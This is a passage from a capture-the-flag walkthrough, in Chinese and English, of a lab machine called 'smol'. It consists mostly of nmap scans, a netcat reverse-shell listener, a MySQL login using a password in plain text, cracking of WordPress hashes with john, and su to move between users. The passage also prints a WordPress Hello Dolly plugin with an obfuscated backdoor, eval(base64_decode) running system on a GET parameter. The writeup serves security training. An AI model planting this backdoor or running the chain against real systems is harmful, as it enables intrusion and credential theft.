nmap -sP 192.168.56.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-05 01:24 EST Nmap scan report for192.168.56.1 Host is up (0.00030s latency). MAC Address: 0A:00:27:00:00:09 (Unknown) Nmap scan report for192.168.56.2 Host is up (0.00024s latency). MAC Address: 08:00:27:4C:6C:28 (Oracle VirtualBox virtual NIC) Nmap scan report for192.168.56.16 Host is up (0.00031s latency). MAC Address: 08:00:27:75:EE:3F (Oracle VirtualBox virtual NIC)
1 2 3 4 5 6 7 8 9
nmap -sT -min-rate 10000 -p- 192.168.56.16 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-05 01:25 EST Nmap scan report for192.168.56.16 Host is up (0.00039s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:75:EE:3F (Oracle VirtualBox virtual NIC)
nmap -sT -sV -A -T4 80192.168.56.16 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-05 01:55 EST Nmap scan report for www.smol.hmv (192.168.56.16) Host is up (0.00044s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 307244:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA) | 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA) |_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: WordPress 6.3 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: AnotherCTF MAC Address: 08:00:27:75:EE:3F (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 10.44 ms www.smol.hmv (192.168.56.16)
1 2 3 4 5 6 7 8 9 10 11 12
nmap -script=vuln -p- 192.168.56.16 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-05 01:27 EST Nmap scan report for192.168.56.16 Host is up (0.00042s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. MAC Address: 08:00:27:75:EE:3F (Oracle VirtualBox virtual NIC)
<?php /** * @package Hello_Dolly * @version 1.7.2 */ /* Plugin Name: Hello Dolly Plugin URI: http://wordpress.org/plugins/hello-dolly/ Description: This isnot just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page. Author: Matt Mullenweg Version: 1.7.2 Author URI: http://ma.tt/ */
function hello_dolly_get_lyric() { /** These are the lyrics to Hello Dolly */ $lyrics = "Hello, Dolly Well, hello, Dolly It's so nice to have you back where you belong You're lookin' swell, Dolly I can tell, Dolly You're still glowin', you're still crowin' You're still goin' strong I feel the room swayin' While the band's playin' One of our old favorite songs from way back when So, take her wrap, fellas Dolly, never go away again Hello, Dolly Well, hello, Dolly It's so nice to have you back where you belong You're lookin' swell, Dolly I can tell, Dolly You're still glowin', you're still crowin' You're still goin' strong I feel the room swayin' While the band's playin' One of our old favorite songs from way back when So, golly, gee, fellas Have a little faith in me, fellas Dolly, never go away Promise, you'll never go away Dolly'll never go away again";
// Here we split it into lines. $lyrics = explode( "\n", $lyrics );
// And then randomly choose a line. return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] ); }
// This just echoes the chosen line, we'll position it later. function hello_dolly() { eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=')); $chosen = hello_dolly_get_lyric(); $lang = ''; if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) { $lang = ' lang="en"'; } printf( '<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>', __( 'Quote from Hello Dolly song, by Jerry Herman:' ), $lang, $chosen ); } // Now we set that function up to execute when the admin_notices action is called. add_action( 'admin_notices', 'hello_dolly' ); // We need some CSS to position the paragraph. function dolly_css() { echo " <style type='text/css'> #dolly { float: right; padding: 5px 10px; margin: 0; font-size: 12px; line-height: 1.6666; } .rtl #dolly { float: left; } .block-editor-page #dolly { display: none; } @media screen and (max-width: 782px) { #dolly, .rtl #dolly { float: none; padding-left: 0; padding-right: 0; } } </style> "; } add_action( 'admin_head', 'dolly_css' );
┌──(root㉿kali)-[~] └─# nc -lvp 4444 listening on [any] 4444 ... connect to [192.168.56.4] from www.smol.hmv [192.168.56.16] 42818 bash: cannot set terminal process group (788): Inappropriate ioctl for device bash: no job control in this shell www-data@smol:/var/www/wordpress/wp-admin$
www-data@smol:/var/www/wordpress/wp-admin$ mysql -u wpuser -p mysql -u wpuser -p Enter password: kbLSF2Vop#lw3rjDZ629*Z%G
Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection idis61371 Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2024, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type'help;'or'\h'forhelp. Type'\c' to clear the current input statement.
mysql>
然后拿到开膛手杰克进行破解,最后能爆破出一个密码 sandiegocalifornia
1 2 3 4 5 6 7
john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 6 password hashes with6 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3]) Cost 1 (iteration count) is8192forall loaded hashes Will run 8 OpenMP threads Press 'q'or Ctrl-C to abort, almost any other key for status sandiegocalifornia (?)
本来想通过ssh来登录,但是提示须要SSH私钥
最后通过su的方法来切换用户,最后可以切换到diego用户
1 2 3 4 5
www-data@smol:/var/www/wordpress/wp-admin$ su diego su diego Password: sandiegocalifornia
System information as of Wed 05 Feb 2025 06:40:43 PM UTC
System load: 0.06 Processes: 218 Usage of /: 55.8% of 9.75GB Users logged in: 0 Memory usage: 35% IPv4 address for enp0s17: 192.168.56.16 Swap usage: 0%
Expanded Security Maintenance for Applications isnot enabled.
162 updates can be applied immediately. 125 of these updates are standard security updates. To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old. To check for new updates run: sudo apt update
think@smol:~$
在gege用户加目录下发现wordpress.old.zip文件,但是没有权限读取
1 2 3 4 5 6 7 8 9 10 11 12 13
think@smol:/home/gege$ ls -al total 31532 drwxr-x--- 2 gege internal 4096 Aug 182023 . drwxr-xr-x 6 root root 4096 Aug 162023 .. lrwxrwxrwx 1 root root 9 Aug 182023 .bash_history -> /dev/null -rw-r--r-- 1 gege gege 220 Feb 252020 .bash_logout -rw-r--r-- 1 gege gege 3771 Feb 252020 .bashrc -rw-r--r-- 1 gege gege 807 Feb 252020 .profile lrwxrwxrwx 1 root root 9 Aug 182023 .viminfo -> /dev/null -rwxr-x--- 1 root gege 32266546 Aug 162023 wordpress.old.zip
